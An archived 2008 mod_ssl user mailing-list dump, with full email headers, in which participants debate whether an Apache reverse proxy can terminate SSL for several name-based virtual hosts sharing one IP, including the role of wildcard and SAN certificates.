X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Fri 27/06/08 and will not return u=
ntil
Mon 21/07/08.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 10 22:24:27 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3F6C314DA28; Thu, 10 Jul 2008 22:24:27 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.timeeclipse.com (mail.server5000.com [216.190.150.46])
	by master.modssl.org (Postfix) with ESMTP id 4DB6A14D872
	for ; Thu, 10 Jul 2008 22:24:26 +0200 (CEST)
Received: from thepinc.com [208.187.217.149] by mail.timeeclipse.com with ESMTP
  (SMTPD32-7.15) id AFBD1FDD0256; Thu, 10 Jul 2008 14:23:25 -0600
Message-ID: <410-220087410202352796@thepinc.com>
From: "nrssl@thepinc.com" 
To: "modssl-users@modssl.org" 
Subject: SSL proxy
Date: Thu, 10 Jul 2008 14:23:52 -0600
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "nrssl@thepinc.com" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have several web servers currently that all have the same IP, but
different host names, and I have an apache that uses mod_proxy to direct
requests to the correct internal server to process the request.

I would like to use my apache proxy server to provide SSL encryption and
decryption, and not have to have each individual server do that.

Is that possible?

I have worked with virtual host configuration, and I have tried to set up
the ssl stuff so that this will work, but so far I have not been successful.

I have tried to search for this, but the closest I have come is proxy to an
ssl server.  I want to have the proxy server do the ssl stuff for me.

Can anyone provide instructions or links?

Thanks.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 10 22:39:13 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4B09114DA55; Thu, 10 Jul 2008 22:39:13 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtp7-g19.free.fr (smtp7-g19.free.fr [212.27.42.64])
	by master.modssl.org (Postfix) with ESMTP id 076B514DA24
	for ; Thu, 10 Jul 2008 22:39:12 +0200 (CEST)
Received: from smtp7-g19.free.fr (localhost [127.0.0.1])
	by smtp7-g19.free.fr (Postfix) with ESMTP id 8357432286E
	for ; Thu, 10 Jul 2008 22:38:15 +0200 (CEST)
Received: from [192.168.12.11] (lns-bzn-48f-62-147-219-210.adsl.proxad.net [62.147.219.210])
	by smtp7-g19.free.fr (Postfix) with ESMTP id 306DB32286B
	for ; Thu, 10 Jul 2008 22:38:15 +0200 (CEST)
Message-ID: <48767337.1060206@gmail.com>
Date: Thu, 10 Jul 2008 22:38:15 +0200
From: "Gilles Cuesta (Gmail)" 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL proxy
References: <410-220087410202352796@thepinc.com>
In-Reply-To: <410-220087410202352796@thepinc.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Cuesta (Gmail)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

nrssl@thepinc.com a écrit :
> I have several web servers currently that all have the same IP, but
> different host names, and I have an apache that uses mod_proxy to direct
> requests to the correct internal server to process the request.
>
> I would like to use my apache proxy server to provide SSL encryption and
> decryption, and not have to have each individual server do that.
>
> Is that possible?
>   
Apparently, understanding what you want to do, it's possible.

It might depend on Apache / modssl versions

One of the best way is doing encrypted HTTPS between client and proxy 
and clear HTTP between proxy and real server.
You can also do encrypted HTTPS between proxy and real server, just 
adding some Apache configuration
.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 10 22:53:47 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 96C0D14DA59; Thu, 10 Jul 2008 22:53:47 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.timeeclipse.com (mail.server5000.com [216.190.150.46])
	by master.modssl.org (Postfix) with ESMTP id 9BBBD14DA53
	for ; Thu, 10 Jul 2008 22:53:46 +0200 (CEST)
Received: from thepinc.com [208.187.217.149] by mail.timeeclipse.com with ESMTP
  (SMTPD32-7.15) id A6A124360068; Thu, 10 Jul 2008 14:52:49 -0600
Message-ID: <410-220087410205316140@thepinc.com>
From: "nrssl@thepinc.com" 
To: "modssl-users@modssl.org" 
Subject: 
Date: Thu, 10 Jul 2008 14:53:16 -0600
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "nrssl@thepinc.com" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, that is exactly what I want to do.  Any pointers?

Thanks.


Gilles Cuesta Wrote:

One of the best way is doing encrypted HTTPS between client and proxy 
and clear HTTP between proxy and real server.




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 09:31:39 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EF46B14DA50; Fri, 11 Jul 2008 09:31:38 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from gv-out-0910.google.com (gv-out-0910.google.com [216.239.58.185])
	by master.modssl.org (Postfix) with ESMTP id C4A9714D85B
	for ; Fri, 11 Jul 2008 09:31:37 +0200 (CEST)
Received: by gv-out-0910.google.com with SMTP id y18so629717gvf.27
        for ; Fri, 11 Jul 2008 00:30:40 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:in-reply-to:mime-version:content-type:references;
        bh=NDOQWxcrn1iSWRzhS8m2XD2ZZQ2ImF0uKhDvVcvMFQI=;
        b=BTiT3Mm68QSJ/u2js1+8D4ZVTA37arctrdPQxJnkTmuwOoB3ArSREcM0N7u1H2m6d5
         2mjHR/HM015WtFwnqjxlgGLLCZqSld7Xb8viqzUyzWttUjGWdMXjF7ZRhNUf4pArAtmH
         B2GotfxXDi3eUs0EYAdgROnVutuvMVlgiNVPE=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version
         :content-type:references;
        b=LNOhFtyOYkOZ4gOcNV+ovZTmH3dkCH4SWHAEhI/0lXRYqzApewa/1ZFCcNDYlDzRwx
         UKwmeXRo54kZI21Mhh8FzreV3r71G2/zWLQG/uDFzG5ox7wqt+JYYuClSPuGPkZc46Pe
         o5iK/1ReXyDGuFzdyXoj+7ACCq40+xF6JRQkA=
Received: by 10.103.213.19 with SMTP id p19mr5155785muq.70.1215761439810;
        Fri, 11 Jul 2008 00:30:39 -0700 (PDT)
Received: by 10.103.181.17 with HTTP; Fri, 11 Jul 2008 00:30:39 -0700 (PDT)
Message-ID: <96f2fc380807110030g7b638733he977c303846eecc2@mail.gmail.com>
Date: Fri, 11 Jul 2008 09:30:39 +0200
From: "mdn teo" 
To: modssl-users@modssl.org
Subject: Re: SSL proxy
In-Reply-To: <68ee06d0807110028s9c58724x440b7c0818a32064@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1643_11818968.1215761439822"
References: <410-220087410202352796@thepinc.com> <48767337.1060206@gmail.com>
	 <68ee06d0807110028s9c58724x440b7c0818a32064@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "mdn teo" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1643_11818968.1215761439822
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

How is it possible? By definition SSL does not allow different host names o=
n
the same IP:PORT.
Or is there something I'm missing?




> ---------- Forwarded message ----------
> From: Gilles Cuesta (Gmail) 
> Date: Thu, Jul 10, 2008 at 10:38 PM
> Subject: Re: SSL proxy
> To: modssl-users@modssl.org
>
>
> nrssl@thepinc.com a =E9crit :
>
>> I have several web servers currently that all have the same IP, but
>> different host names, and I have an apache that uses mod_proxy to direct
>> requests to the correct internal server to process the request.
>>
>> I would like to use my apache proxy server to provide SSL encryption and
>> decryption, and not have to have each individual server do that.
>>
>> Is that possible?
>>
>>
> Apparently, understanding what you want to do, it's possible.
>
> It might depend on Apache / modssl versions
>
> One of the best way is doing encrypted HTTPS between client and proxy and
> clear HTTP between proxy and real server.
> You can also do encrypted HTTPS between proxy and real server, just addin=
g
> some Apache configuration
>
> .
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

------=_Part_1643_11818968.1215761439822
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline


How is it possible? By definition SSL does not a=
llow different host names on the same IP:PORT. 


Or is there something I'm missing?




 




---------- Forwarded message ----------
From:=
 Gilles Cuesta (Gmail) <gilles.cuesta@gmail.com&=
gt;

Date: Thu, Jul 10, 2008 at 10:38 PM
Subject: Re: SSL proxy
To: modssl-users@modssl.=
org


n=
rssl@thepinc.com a =E9crit :=20




I have several web s=
ervers currently that all have the same IP, but
different host names, an=
d I have an apache that uses mod_proxy to direct

requests to the correct internal server to process the request.

I wo=
uld like to use my apache proxy server to provide SSL encryption and
dec=
ryption, and not have to have each individual server do that.

Is tha=
t possible?

 
Apparently, understanding what you want to do,=
 it's possible.

It might depend on Apache / modssl versions
<=
br>One of the best way is doing encrypted HTTPS between client and proxy an=
d clear HTTP between proxy and real server.

You can also do encrypted HTTPS between proxy and real server, just adding =
some Apache configuration=20






.
_____________________________________________________________=
_________
Apache Interface to OpenSSL (mod_ssl)       &nb=
sp;           www.modssl.org
User Support Mailing List   &nb=
sp;                  modssl-users@modssl.o=
rg

Automated List Manager               &nb=
sp;            majordomo@modssl.org
<=
br>



------=_Part_1643_11818968.1215761439822--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 09:58:04 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D89C714DA50; Fri, 11 Jul 2008 09:58:04 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id 7295514D85B
	for ; Fri, 11 Jul 2008 09:58:03 +0200 (CEST)
Received: from mailsmtp.werum.net (mailsmtp.werum.net [172.20.0.111])
	by mx1.werum.de (Postfix) with ESMTP id EC4CD31A92C
	for ; Fri, 11 Jul 2008 09:57:06 +0200 (CEST)
Received: from werum815.werum.net ( [172.20.104.15]) by mailsmtp.werum.net
          (Spamfinder) with SMTP id 1D06C33E765; Fri, 11 Jul 2008 09:57:05 +0200
Received: from localhost (content-scanner.mail.werum.net [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 6E2C0179C64;
	Fri, 11 Jul 2008 09:57:03 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 25842-02; Fri, 11 Jul 2008 09:42:36 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 9F302179C63
	for ; Fri, 11 Jul 2008 09:57:02 +0200 (CEST)
Message-ID: <4877124F.40604@werum.de>
Date: Fri, 11 Jul 2008 09:57:03 +0200
From: Eckard Wille 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject:Re: SSL proxy
References: <410-220087410202352796@thepinc.com>
In-Reply-To: <410-220087410202352796@thepinc.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-4.32 tagged_above=-999 required=300
 tests=ALL_TRUSTED, AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

nrssl@thepinc.com schrieb:
> I have several web servers currently that all have the same IP, but
> different host names, and I have an apache that uses mod_proxy to direct
> requests to the correct internal server to process the request.
> 
> I would like to use my apache proxy server to provide SSL encryption and
> decryption, and not have to have each individual server do that.
> 
> Is that possible?
> 
> I have worked with virtual host configuration, and I have tried to set up
> the ssl stuff so that this will work, but so far I have not been successful.
> 
> I have tried to search for this, but the closest I have come is proxy to an
> ssl server.  I want to have the proxy server do the ssl stuff for me.

Hi,

you can not use SSL with virtual hosting, see 
http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47

You'll have to get a dedicated ip for every single ssl host. You could 
play around with one ssl proxy on your single ip with a common name 
and do some rewriting according to an url praefix matching the secure 
parts of your backend virtual hosts; decide yourself if this config 
work is worth it.

Regards

Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 10:03:29 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AFCD114DA50; Fri, 11 Jul 2008 10:03:29 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.169])
	by master.modssl.org (Postfix) with ESMTP id 44EEB14D85B
	for ; Fri, 11 Jul 2008 10:03:28 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id o29so37392ugd.28
        for ; Fri, 11 Jul 2008 01:02:31 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=cr65R89YS6uwQf2NOFfv4lDlFCxwnX4sJZX0odXe6/U=;
        b=ip+05a9dx+pn1xJmAvB0cOm2B4Jl+i5s7/f/pCaz2gBI38/7kKcBUZGb4hGta8zg8a
         Nb4ky5gL5/HKVu6Ag59x1QszVN6den8uporZlnmCBAgrXSDQrjT5qmpng9vRYndDa15L
         D6Wu1uLEtkxdnexbAVgD2JA8gHqwWGN8S2ppo=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=cyBxmWlNtmTV34n3TtrI6NncU8f2OY52/DDlB8IGtrd++LBcCht9JZFohG/HFxoEeM
         GnMMp3U+hcYmKKJb4KmfYQn5Bm0ODq2XZatUxazQz/ljU6cAKRsg/xtc6gZcrBVylbFi
         Gf1AEsUvNoCK36mZlJmhy6z5QrT+KAW0c7+Gk=
Received: by 10.125.134.4 with SMTP id l4mr2760321mkn.118.1215763351647;
        Fri, 11 Jul 2008 01:02:31 -0700 (PDT)
Received: from ?192.168.12.138? ( [213.41.232.32])
        by mx.google.com with ESMTPS id d13sm823518fka.3.2008.07.11.01.02.30
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Fri, 11 Jul 2008 01:02:30 -0700 (PDT)
Message-ID: <4877138E.70608@gmail.com>
Date: Fri, 11 Jul 2008 10:02:22 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL proxy
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de>
In-Reply-To: <4877124F.40604@werum.de>
X-Enigmail-Version: 0.95.6
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig8322AB6A12A6E359CC37AD8F"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig8322AB6A12A6E359CC37AD8F
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable

Eckard Wille a =E9crit :
> nrssl@thepinc.com schrieb:
>> I have several web servers currently that all have the same IP, but
>> different host names, and I have an apache that uses mod_proxy to dire=
ct
>> requests to the correct internal server to process the request.
>>
>> I would like to use my apache proxy server to provide SSL encryption a=
nd
>> decryption, and not have to have each individual server do that.
>>
>> Is that possible?
>>
>> I have worked with virtual host configuration, and I have tried to=20
>> set up
>> the ssl stuff so that this will work, but so far I have not been=20
>> successful.
>>
>> I have tried to search for this, but the closest I have come is proxy =

>> to an
>> ssl server.  I want to have the proxy server do the ssl stuff for me.
>
> Hi,
>
> you can not use SSL with virtual hosting, see=20
> http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47
>
> You'll have to get a dedicated ip for every single ssl host. You could =

> play around with one ssl proxy on your single ip with a common name=20
> and do some rewriting according to an url praefix matching the secure=20
> parts of your backend virtual hosts; decide yourself if this config=20
> work is worth it.
I thought that using wildcard or multi-cn certificates will work ?
In this case, only one certificate is needeed for a range of Vhost

--=20
Gilles CUESTA - Logiciels Libres
69139920



--------------enig8322AB6A12A6E359CC37AD8F
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIdxOR545quQSHen8RAs2UAKDTpfXdP7oojVv2cN2NJ8mOLhajTgCeJ0ID
Z09jBS0mqyjDumkRoPmHoBc=
=TFva
-----END PGP SIGNATURE-----

--------------enig8322AB6A12A6E359CC37AD8F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 11:57:30 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 34C4614DA53; Fri, 11 Jul 2008 11:57:30 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id 004D714D85B
	for ; Fri, 11 Jul 2008 11:57:29 +0200 (CEST)
Received: from mailsmtp.werum.net (mailsmtp.werum.net [172.20.0.111])
	by mx1.werum.de (Postfix) with ESMTP id EF6BC31A93A
	for ; Fri, 11 Jul 2008 11:56:30 +0200 (CEST)
Received: from werum815.werum.net ( [172.20.104.15]) by mailsmtp.werum.net
          (Spamfinder) with SMTP id 4FDB322EB01; Fri, 11 Jul 2008 11:56:29 +0200
Received: from localhost (content-scanner.mail.werum.net [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 7F38F179C63;
	Fri, 11 Jul 2008 11:56:27 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 03019-02; Fri, 11 Jul 2008 11:42:00 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id A2CB8179C64
	for ; Fri, 11 Jul 2008 11:56:26 +0200 (CEST)
Message-ID: <48772E49.2050107@werum.de>
Date: Fri, 11 Jul 2008 11:56:25 +0200
From: Eckard Wille 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject:Re: SSL proxy
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de> <4877138E.70608@gmail.com>
In-Reply-To: <4877138E.70608@gmail.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-4.399 tagged_above=-999 required=300
 tests=ALL_TRUSTED, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Cuesta Gilles schrieb:
> I thought that using wildcard or multi-cn certificates will work ?

No.

> In this case, only one certificate is needeed for a range of Vhost

If you only have one ip this won't make things better because virtual 
hosting is still not possible. Wildcard certs do not enable vHosting 
because the ssl handshake still takes place before the http host 
header can be evaluated. They were offered by CAs to make it easier 
for admins so they wouldn't have to fiddle around with dozens of certs 
and their validity management in a masshosting environment or for 
subdomains.

Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 12:45:37 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7405814DA53; Fri, 11 Jul 2008 12:45:37 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.186])
	by master.modssl.org (Postfix) with ESMTP id 03D4114D85B
	for ; Fri, 11 Jul 2008 12:45:35 +0200 (CEST)
Received: by nf-out-0910.google.com with SMTP id b2so1249749nfb.41
        for ; Fri, 11 Jul 2008 03:44:38 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=9yPVD23Vwz0ImmZUL7eBaJNHHBIf8Og7m2H2vVK3SuQ=;
        b=BJI5W6ZHESbsty4MdGFeGZDaNHXSI3jdtcAU/cP83McCj8IozPvtMJw/YTMCMySTtb
         aghGVZCBIWq8j/x1yL3WIq7ZZinndJYHVxJbHctgYnJLXPszNm+h49SUlHD7yemKTCAI
         92pH2pP9gfygd6HOe7W8sPwLQ1mB8KexfOW3I=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=MYPLvmuRSUxagwUurRDlXwt4pPcX5HyLVhCi0xVMFaD09GL8CaQLRb6tGN0fF50Gcv
         J4vXUl4tjiQRjV53Q/54BolObdgprLN/+qVcO0/cLAYpCHFOUVA/9yQbjKNd5zvjROCp
         XKpEwGu4Pe2HNnfenjro1S9V6vPxJoxP8u3l0=
Received: by 10.125.16.5 with SMTP id t5mr2891704mki.50.1215773078060;
        Fri, 11 Jul 2008 03:44:38 -0700 (PDT)
Received: from ?192.168.12.138? ( [213.41.232.32])
        by mx.google.com with ESMTPS id 39sm637174hui.60.2008.07.11.03.44.35
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Fri, 11 Jul 2008 03:44:36 -0700 (PDT)
Message-ID: <48773992.2080705@gmail.com>
Date: Fri, 11 Jul 2008 12:44:34 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL proxy
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de> <4877138E.70608@gmail.com> <48772E49.2050107@werum.de>
In-Reply-To: <48772E49.2050107@werum.de>
X-Enigmail-Version: 0.95.6
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig3FD21A20A2BD020081B2FC37"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig3FD21A20A2BD020081B2FC37
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable

Eckard Wille a =E9crit :
> Cuesta Gilles schrieb:
>> I thought that using wildcard or multi-cn certificates will work ?
>
> No.
>
>> In this case, only one certificate is needeed for a range of Vhost
>
> If you only have one ip this won't make things better because virtual=20
> hosting is still not possible. Wildcard certs do not enable vHosting=20
> because the ssl handshake still takes place before the http host=20
> header can be evaluated. They were offered by CAs to make it easier=20
> for admins so they wouldn't have to fiddle around with dozens of certs =

> and their validity management in a masshosting environment or for=20
> subdomains.
>

So what about this ?
"*MULTIPLE CN (SAN) SERVER CERTIFICATES*

This type of certificate (also called /Subject Alternative Name/ (SAN) ) =

enables to secure not only one website but a large number of sites (a=20
list of sites) hosted on a shared infrastructure (server with multiple=20
names, reverse proxy). Ideal to secure multiple brands of a corporation. =

One certificate per hardware is required."

http://www.tbs-certificats.com/index.html.en

--=20
Gilles CUESTA - Logiciels Libres
69139920



--------------enig3FD21A20A2BD020081B2FC37
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIdzmS545quQSHen8RAha4AKCVFSOS7NlxqUKMdHC9uI+Df3tlZACgkPyQ
W/Q8R0u54ICG9FsBnrO/JPY=
=/rrm
-----END PGP SIGNATURE-----

--------------enig3FD21A20A2BD020081B2FC37--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 13:21:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 103F714DA53; Fri, 11 Jul 2008 13:21:01 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id B482914D85B
	for ; Fri, 11 Jul 2008 13:21:00 +0200 (CEST)
Received: from mailsmtp.werum.net (mailsmtp.werum.net [172.20.0.111])
	by mx1.werum.de (Postfix) with ESMTP id 5940831A93F
	for ; Fri, 11 Jul 2008 12:57:26 +0200 (CEST)
Received: from werum815.werum.net ( [172.20.104.15]) by mailsmtp.werum.net
          (Spamfinder) with SMTP id 5306DE7535A; Fri, 11 Jul 2008 12:57:24 +0200
Received: from localhost (content-scanner.mail.werum.net [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 6AAA4179C63;
	Fri, 11 Jul 2008 12:57:22 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 08194-04; Fri, 11 Jul 2008 12:42:55 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 631D1179C68
	for ; Fri, 11 Jul 2008 12:57:21 +0200 (CEST)
Message-ID: <48773C93.3010602@werum.de>
Date: Fri, 11 Jul 2008 12:57:23 +0200
From: Eckard Wille 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject:Re: SSL proxy
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de> <4877138E.70608@gmail.com> <48772E49.2050107@werum.de> <48773992.2080705@gmail.com>
In-Reply-To: <48773992.2080705@gmail.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-4.399 tagged_above=-999 required=300
 tests=ALL_TRUSTED, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
